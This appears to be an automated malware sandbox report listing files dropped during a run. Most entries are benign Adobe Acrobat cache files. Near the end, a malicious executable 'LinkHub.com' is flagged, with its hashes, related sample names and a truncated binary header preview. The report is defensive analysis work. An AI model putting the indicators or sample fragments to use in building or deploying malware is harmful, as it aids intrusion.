Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.298295591896676
Encrypted:	false
SSDEEP:	6:YEQXJ2HXBcMI/3It7H39VoZcg1vRcR0YVKoAvJfBD2G6UpnrPeUkwRe9:YvXKXBcMIWEZc0vS5GR22cUkee9
MD5:	A64F0B4E8EAFC1BF8C909E6AA59D3D27
SHA1:	7011CBB8A4302B509C71C3F9FA3434B6466E9630
SHA-256:	7B581EB56EC22DE29B42EA706E0FFB4B7BE2B98304315596E1A219603E26415D
SHA-512:	2F241DFFB4272484F2A32E2A47C98ABBC392D40C3235BF805B85655CA50D6A5686774A538717E6489A7DC86C23AA26A2037E7E1213BBB71A2E50BED5A528B583
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.355564126811593
Encrypted:	false
SSDEEP:	6:YEQXJ2HXBcMI/3It7H39VoZcg1vRcR0YVKoAvJfPmwrPeUkwRe9:YvXKXBcMIWEZc0vS5GH56Ukee9
MD5:	FBA0FFAF8CE9A26AEA6A2A5FBA7A87C2
SHA1:	C6C74F6852278B25DB042ED3FF6C5194E045070F
SHA-256:	0087942E311F26D29E2F58F3B40BC5A588F7348210A42DD7D13C4A038ECF2E95
SHA-512:	EE462018F1912130DD55729020B6CB03A3FB215F297D6156E23B586140A8A395979A81925BFD5F9B6A835ED5D9781DEF019130EB7D52D5FE2AE5F329EC7C838C
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.6941899712395
Encrypted:	false
SSDEEP:	24:Yv6XBcNZzvSepLgE9cQx8LennAvzBvkn0RCmK8czOCCSpn:YvEcNt1hgy6SAFv5Ah8cv/p
MD5:	833C8702BD6630FAED2C65F77B5155C7
SHA1:	EBB25039AF1D7FFBE22853869238016F39087314
SHA-256:	9697BB6241759ED2768B7296F47C93A50CB2A9F79B46C3359988C7B4B2115E42
SHA-512:	2DE80604AFA7F7B05E7318313C966A8646EDAE7BD67FA176B17C7CA0CB7C838B86112307E4AB46D36272ADBCFB2982E6CC08C6C79E3BD5C20131FF5C2477CB67
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.306167738660606
Encrypted:	false
SSDEEP:	6:YEQXJ2HXBcMI/3It7H39VoZcg1vRcR0YVKoAvJf8dPeUkwRe9:YvXKXBcMIWEZc0vS5GU8Ukee9
MD5:	B69FBCD4CDE1D571C481E7D2D94A6329
SHA1:	E1819ACB8E81F180594DB0E461833B8256C4DFA2
SHA-256:	9CD6CBE9272FF9B5E4813323F29AF55753C1BCA8B94679256A2E2669B74DAEAD
SHA-512:	A8EFFEA6B431337CD6D88964DAABE069BB24353A16ADFD860ACE01AFE9B3160D044EAA821C8E91AD0B00925379FCB8D621B92A96DED8C692C74402288335DCDD
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.310895603279125
Encrypted:	false
SSDEEP:	6:YEQXJ2HXBcMI/3It7H39VoZcg1vRcR0YVKoAvJfQ1rPeUkwRe9:YvXKXBcMIWEZc0vS5GY16Ukee9
MD5:	3ED1D333A8B8F59A7018E7DD260B17E0
SHA1:	20A00CBD620F944B7D9DA2C2BEE388DEE83C7BD7
SHA-256:	65BF277C485C956921E214249F480CEAEACA4D092B46A8B5E2F3A6B6CEE5F7FD
SHA-512:	3EB407514C72C30BAD9445BA707B0362743FB1EB2BE20D3CD079CF8774A47159E6AA5674F4DFDEFE63F0250E3729961B36D2A9790ECCE7778B7B662B3822E45A
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.317237297153344
Encrypted:	false
SSDEEP:	6:YEQXJ2HXBcMI/3It7H39VoZcg1vRcR0YVKoAvJfFldPeUkwRe9:YvXKXBcMIWEZc0vS5Gz8Ukee9
MD5:	EF7DACD2CA1702EFCF74326357AD421C
SHA1:	4203FA9AE300ABB7AEBB65CD38150464E56BBDEC
SHA-256:	F97AC3A924D607AB8E5225F22251BD3A25365F2B15A9BA4AF46D2AEF7D7E00C2
SHA-512:	A69DA842C018E61D6F2D7FFE2B0D612DD3693D900B86474FE5B1756F8E7901EFA6150CF58F79659B1716C7AB32E8D7DD0D6A2840E3161229A9435FBBAD2B107F
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.331393430654942
Encrypted:	false
SSDEEP:	6:YEQXJ2HXBcMI/3It7H39VoZcg1vRcR0YVKoAvJfzdPeUkwRe9:YvXKXBcMIWEZc0vS5Gb8Ukee9
MD5:	EB56EB31DF4E390D8DA08B5C56A53A6C
SHA1:	19B694A93D517A187F642A2FA672F644687048DF
SHA-256:	8AB176F8012C914422045E523C5B234C72BB00F2BB36209AB2F7E34B2888B6AB
SHA-512:	D92D3733CC182A80E6607503552C2BAA835C4180626AF796A94734DFDA3BD06143CD308C6664E4F32CE6F5D56D12FD520AC11C4A188222518837525174A8D398
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.312564404789111
Encrypted:	false
SSDEEP:	6:YEQXJ2HXBcMI/3It7H39VoZcg1vRcR0YVKoAvJfYdPeUkwRe9:YvXKXBcMIWEZc0vS5Gg8Ukee9
MD5:	652819E4F7C26AA081BA1B6567EA74AD
SHA1:	04A64F05DD1123715E1C7739C76AB86A0973804A
SHA-256:	3D5ADC6866DB5C41AFC38F96F2580C3B13A84BCDD420D32B5B223D63BC272D8A
SHA-512:	96110591846912D5262AA2FA19458FFDC699800EE276D5C98E15558882FC0390791C08EC2DFBAE97AE27CE29BD4ADCAEFD61B0750ABBB8F26C892B1B6ACC3848
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.2985182803886115
Encrypted:	false
SSDEEP:	6:YEQXJ2HXBcMI/3It7H39VoZcg1vRcR0YVKoAvJf+dPeUkwRe9:YvXKXBcMIWEZc0vS5G28Ukee9
MD5:	8A993C4754517A9E8E669C411FA6F2E5
SHA1:	7B29E7856FA0C1C30E71E49D1715B6AEF1E037F1
SHA-256:	5F984A27A1C508E7663E9A291A787BA33D7674A5F6EA48126C242D37A449A804
SHA-512:	430A86D17386B532A2969499855283BFF14D1D532CA9EC100E0C27630138B57BE8ECC815F8B72C79566E4B6AD6317C213C49A8C13E960347823F07746FC27A58
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.296025149165454
Encrypted:	false
SSDEEP:	6:YEQXJ2HXBcMI/3It7H39VoZcg1vRcR0YVKoAvJfbPtdPeUkwRe9:YvXKXBcMIWEZc0vS5GDV8Ukee9
MD5:	879E2EA16483EF23CE8C04E306296E7D
SHA1:	4CADE9961384465562579DB55DCD92483569B12B
SHA-256:	A9D23478E7172B9C803467D0AD5136B9406B12546DE731947270F385FAE9517D
SHA-512:	10165C840B9BECC6330895FED30AE528ABBC82A74AB67BEC83487CE0EA69537CD51326CC3067A7760376B275EBAE3C977EEAA1BFD46FD62FCCA4C06F99FD063E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.301146377513931
Encrypted:	false
SSDEEP:	6:YEQXJ2HXBcMI/3It7H39VoZcg1vRcR0YVKoAvJf21rPeUkwRe9:YvXKXBcMIWEZc0vS5G+16Ukee9
MD5:	34D0C91352D5E57489B95866BFB1D3DD
SHA1:	89DF44DD69F0AB8A9A6788E1B5DBA40EC8AA265D
SHA-256:	6A1B8D029BCAB48A0C7CE512736CE480E011E6E09C775F6EAFFD8379853670BC
SHA-512:	F7B55D7BFE3009F377803B4EE20B65C740725DEA1CB2A6AD73053D1B8E8964547668B6BFB300832D4507230BA5455535A3F16778E78454544C3293ACC6110B2C
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.672434491723989
Encrypted:	false
SSDEEP:	24:Yv6XBcNZzvSCamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSpn:YvEcNtBBgkDMUJUAh8cvMp
MD5:	211B393F67D3F8A2465FCCF2574D9FED
SHA1:	F638019A0D1BEF556DCE23A9B70FCAABD797DA48
SHA-256:	2C9F7350911436D533006A1D89CB420AFE8995C393D6F10810E9EC1EA9E499ED
SHA-512:	21586319849245FED3B58F386B2672B4180D4B820A03ABDC516DA9B44F2F88839B6A972E6AA373D6F910576DD74690294CE55ED381F5985CCE39F66E8F42D31C
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.278214002434925
Encrypted:	false
SSDEEP:	6:YEQXJ2HXBcMI/3It7H39VoZcg1vRcR0YVKoAvJfshHHrPeUkwRe9:YvXKXBcMIWEZc0vS5GUUUkee9
MD5:	AF5C4E9F119496451FF60148C6F23E19
SHA1:	0D477ECE8D677CFC0E9A3BC4CCDF923C3904BC38
SHA-256:	63162C1AAD3CCEDBB231E800167D79706F1FAF13397AB07F22C7A98FD636328A
SHA-512:	EE15C77A0CF2E134F10100AF6E2512EF7EC7ADC0A1E30E1E3AF629B7214162818A1FB202A5BC61875B0238403DD0467B1C78B9ADB385795FE70E088924229D66
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.289102824186549
Encrypted:	false
SSDEEP:	6:YEQXJ2HXBcMI/3It7H39VoZcg1vRcR0YVKoAvJTqgFCrPeUkwRe9:YvXKXBcMIWEZc0vS5GTq16Ukee9
MD5:	271E70C5730D80F8880F445C8655964A
SHA1:	CE176F1A844284C1A3ADFD4F466092A9CE354FB3
SHA-256:	BDC9107A257DFF3371EE51BEDAF95100FB5E425400B6A9E2599673AB930CFE8C
SHA-512:	1E0019B8F90EAB3A12B93AFC7572CE9BB927A632D4690D88B18B5A2CFB873458C046E531700B98FA0172E7D826937AF7411F6069A25436E099BD2F80740A9DFF
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"69775774-a356-4b78-9988-0b1f3ac8bf1a","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736465244014,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.136918296985447
Encrypted:	false
SSDEEP:	24:Ycar49a43ay3D830fAwD6a4uQ4ujYgj0StOCMfA45Lm+EFB6l81VCUp2O2LSzniA:Y6m5wm3XETi7FEKJnzpiAh9F
MD5:	5195AC8389029D1DFBD4BC736A359216
SHA1:	F091763F307F51BE3F2D840BB47072B997F65C34
SHA-256:	D55D8BB94FC5E016DD65437F0C7295E3D0BD5E1779727121401184F2993AF9D3
SHA-512:	23EFFA9EFC2D81F8355DF54CB5F4494E772C2894A3167E7F6970D685EB78B10369AD8D2DA939DF6A8AABB0DC97B82C918FA70D8A27C87451DF66F23C8CC7FA37
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"928799aae3bbc81199c87da68e428a54","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736285588000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"1ac66f6b522ba8bad2c0d09512f34345","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736285588000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"e0c36876eda1af58eb753d6c767bf997","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736285588000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"1a0b0f2cfe64c02657a8b092a12811f7","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736285588000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"d93c11182d81d727568c17b70b6fbdbf","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736285588000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"96232ae055baf90a96ffafea32e4aab4","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.1890987932768307
Encrypted:	false
SSDEEP:	48:TGufl2GL7msEHUUUUUUUUOoaSvR9H9vxFGiDIAEkGVvpqoc:lNVmswUUUUUUUURa+FGSItRc
MD5:	ECCAC2D419E7A1B96464E7639353C24B
SHA1:	23156D1E8F57174DB40C2C2B1BCE0E765D9255E8
SHA-256:	1D4FEB20B19FFEE26E8DF29244C5D6D5E59763C77493AE18BD8528EB681163BC
SHA-512:	BE536773255794B6C9A5D369B1282140EEF2250D2B038337510E592253728A84078D94C790B7825786CE5E648ACD110867E4A4336DF76BF11F4F5E841C0B0D56
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.607187274532013
Encrypted:	false
SSDEEP:	48:7MhKUUUUUUUUUUOoYvR9H9vxFGiDIAEkGVv0qFl2GL7msx:7fUUUUUUUUUURQFGSItyKVmsx
MD5:	6401CE2305A559EB90DA9987854DEFE2
SHA1:	DB2351596FB34D1DB9F21E655BDAA1A08192171F
SHA-256:	6701908671EBEA2F13FEB5008E3ACCCD9AF80B842EFACBB859C6FF6E43B6E789
SHA-512:	03D03EDE40B07A04F45E49DCBF7195FBCC1B210A080F892D99EE3C1AB727BC87B9B77020F162B9A76F0FC71F9AAC0039037C7F6FB7F1D2E5DE21160E88C01231
Malicious:	false
Preview:	.... .c......LKh......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgdfux8dwnCoWl8CtqsY7ztLwkBkYyu:6a6TZ44ADEdf08dwnCoWly92K
MD5:	D45ABD3CC799C165F0B2878EC31B6B2F
SHA1:	3145A5FC16D018ADBB879995FFFF7F1998F0644B
SHA-256:	494F0CCFBF89F7164FF73D8DE7C8DFDBA1E24839E31BFA4A234217CA164501D3
SHA-512:	EF6766BC7E041A5D759604AEC85FE9813BC8AB26245D8E6C3106EB0CB64F173C5346E29A3680EB36DE8BC8F748ECED3548740EB2620C0FDADE7389F29F779753
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: c2.hta, Detection: malicious, Browse Filename: [UPD]Intel_Unit.2.1.exe, Detection: malicious, Browse Filename: 'Set-up.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: RailProvides_nopump.exe, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: installer_1.05_36.8.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: DansMinistrie.exe, Detection: malicious, Browse Filename: installer_1.05_36.7.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.7615351185197845
Encrypted:	false
SSDEEP:	6:RiOnJHonwWDKaJkDHLFkNx5AW9GfwWDKaJkDHLFkNx57:YIQjWaiF+/dG7WaiF+/7
MD5:	9DD76500C74BBB507074A3DA164E755D
SHA1:	72EBC79800AD7A96DCC8923A186D7ECA36561F28
